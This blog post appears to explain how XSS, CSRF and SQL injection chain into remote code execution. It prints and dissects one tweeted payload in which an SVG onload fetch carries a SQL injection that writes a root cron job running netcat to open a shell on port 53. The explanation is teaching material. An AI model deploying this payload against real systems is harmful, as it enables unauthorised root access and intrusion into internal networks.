Since the very first days of the world wide web, these applications are being a great target for hackers minds. New ways to interact with systems via HTTP protocol and technologies gave rise to a whole set of attacks. But until now, some of them remain very special: Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Structured Query Language injection (SQLi) and Remote Code Execution (RCE).
As you may imagine, they are in an ascending order of danger with all the first 3 leading to the last one, RCE. XSS and CSRF are widespread and overlooked while SQLi and RCE although less prevalent are much more deadly. In theory, it’s possible to mount an attack using all of them at the same time, in an interesting analogy to the four horsemen of the apocalypse.
<svg onload=fetch("//HOST/?id=0+union+select'*+*+*+*+*+root+/bin/nc+-lp53+-e+/bin/sh'into+outfile'/etc/cron.d/s'")> pic.twitter.com/uIo3i6IFzg
— Brute Logic (@brutelogic) September 13, 2016
Let’s analyze this. We have a common XSS vector, “<svg onload”, with a simple GET request to a HOST made by fetch() API. The address used is (theoretically) vulnerable to SQLi by means of the id parameter in the default index page. Of course, this would only make sense if the attacker or tester is not able to make that request by him/herself.
So we have also a cross-site scenario: a XSS payload executing in an internal network, for example, where only the victim can make requests to HOST, our target. Another requirement is that MySQL (in our example) runs as root, which would be hard to find in the wild but not in intranets, where there can be personal or development servers.
So with a “SELECT INTO OUTFILE” SQL statement, a cron job is created (/etc/cron.d/s) and scheduled on target machine to run every minute (* * * * *) by root to run a dangerous version of netcat (-e flag). This executes a shell (/bin/sh) at port 53, the same used for DNS which is more likely to be allowed in a firewall (after port 80). A better approach would be to make a reverse connection to attacker/tester but with only 140 characters to tweet (less the ones from the pic), it seems enough to prove a point: RCE.
Here is a video of this exploitation in a local virtual network with all steps to reproduce here (but it’s old).